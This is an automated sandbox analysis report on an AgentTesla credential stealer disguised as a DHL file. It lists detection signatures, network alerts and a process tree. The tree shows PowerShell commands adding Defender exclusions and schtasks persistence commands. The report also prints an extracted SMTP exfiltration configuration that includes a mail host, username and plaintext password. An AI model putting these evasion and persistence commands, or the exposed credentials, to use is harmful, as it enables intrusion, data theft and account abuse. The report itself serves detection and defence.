Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_231437894819.bat.exe

Overview

General Information

Sample name:DHL_231437894819.bat.exe
Analysis ID:1578149
MD5:5d1d0f26ebb26738d78e964c0a57de2d
SHA1:392ed434f12587a91368fb253f75fd6dffbf25ea
SHA256:c01469ec1500b5bbb7ace40f1823b41e0965607d4fa54497f3dff82712c8070a
Tags:exeuser-TeamDreier
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL_231437894819.bat.exe (PID: 7972 cmdline: "C:\Users\user\Desktop\DHL_231437894819.bat.exe" MD5: 5D1D0F26EBB26738D78E964C0A57DE2D)
    • powershell.exe (PID: 7448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1452 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7660 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • uvbIwIYe.exe (PID: 7856 cmdline: C:\Users\user\AppData\Roaming\uvbIwIYe.exe MD5: 5D1D0F26EBB26738D78E964C0A57DE2D)
    • schtasks.exe (PID: 2220 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 2896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 2788 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.keeptraveling-eg.com", "Username": "donia@keeptraveling-eg.com", "Password": "Do76#Zbbdonia"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000010.00000002.3853312298.0000000002E6C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 21 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                10.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  10.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    10.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x34173:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x341e5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x3426f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x34301:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x3436b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x343dd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x34473:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x34503:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.DHL_231437894819.bat.exe.47c5e40.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 27 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_231437894819.bat.exe, ParentProcessId: 7972, ParentProcessName: DHL_231437894819.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ProcessId: 7448, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_231437894819.bat.exe, ParentProcessId: 7972, ParentProcessName: DHL_231437894819.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ProcessId: 7448, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\uvbIwIYe.exe, ParentImage: C:\Users\user\AppData\Roaming\uvbIwIYe.exe, ParentProcessId: 7856, ParentProcessName: uvbIwIYe.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp", ProcessId: 2220, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.241.224.14, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49713
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_231437894819.bat.exe, ParentProcessId: 7972, ParentProcessName: DHL_231437894819.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", ProcessId: 7660, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_231437894819.bat.exe, ParentProcessId: 7972, ParentProcessName: DHL_231437894819.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ProcessId: 7448, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_231437894819.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_231437894819.bat.exe, ParentProcessId: 7972, ParentProcessName: DHL_231437894819.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp", ProcessId: 7660, ProcessName: schtasks.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-19T10:28:23.030175+010020301711A Network Trojan was detected192.168.2.1049718162.241.224.14587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-19T10:28:51.558509+010028555421A Network Trojan was detected192.168.2.1049718162.241.224.14587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-19T10:28:51.558509+010028552451A Network Trojan was detected192.168.2.1049718162.241.224.14587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-19T10:28:23.030175+010028400321A Network Trojan was detected192.168.2.1049718162.241.224.14587TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.keeptraveling-eg.com", "Username": "donia@keeptraveling-eg.com", "Password": "Do76#Zbbdonia"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeReversingLabs: Detection: 71%
                      Multi AV Scanner detection for submitted file
                      Source: DHL_231437894819.bat.exeVirustotal: Detection: 65%Perma Link
                      Source: DHL_231437894819.bat.exeReversingLabs: Detection: 71%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: DHL_231437894819.bat.exeJoe Sandbox ML: detected
                      Source: DHL_231437894819.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49714 version: TLS 1.2
                      Source: DHL_231437894819.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.10:49718 -> 162.241.224.14:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.10:49718 -> 162.241.224.14:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.10:49718 -> 162.241.224.14:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.10:49718 -> 162.241.224.14:587
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.10:49713 -> 162.241.224.14:587
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: ip-api.com
                      Source: global trafficTCP traffic: 192.168.2.10:49713 -> 162.241.224.14:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: mail.keeptraveling-eg.com
                      Source: DHL_231437894819.bat.exe, uvbIwIYe.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: DHL_231437894819.bat.exe, uvbIwIYe.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: RegSvcs.exe, 0000000A.00000002.1539589797.0000000006036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.keeptraveling-eg.com
                      Source: DHL_231437894819.bat.exe, uvbIwIYe.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1467243677.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, DHL_231437894819.bat.exe, 00000000.00000002.1467243677.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1555427783.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: RegSvcs.exe, 0000000A.00000002.1534737744.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: DHL_231437894819.bat.exe, uvbIwIYe.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49714 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, n00.cs.Net Code: Vv2F
                      Source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, n00.cs.Net Code: Vv2F

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.uvbIwIYe.exe.4b83228.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.uvbIwIYe.exe.4b47a08.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_012B4B010_2_012B4B01
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_012BD4040_2_012BD404
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_06D9BB580_2_06D9BB58
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_06D936D70_2_06D936D7
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_06D936E80_2_06D936E8
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_06D915D00_2_06D915D0
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_06D92E100_2_06D92E10
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_06D91A080_2_06D91A08
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_06D93BF80_2_06D93BF8
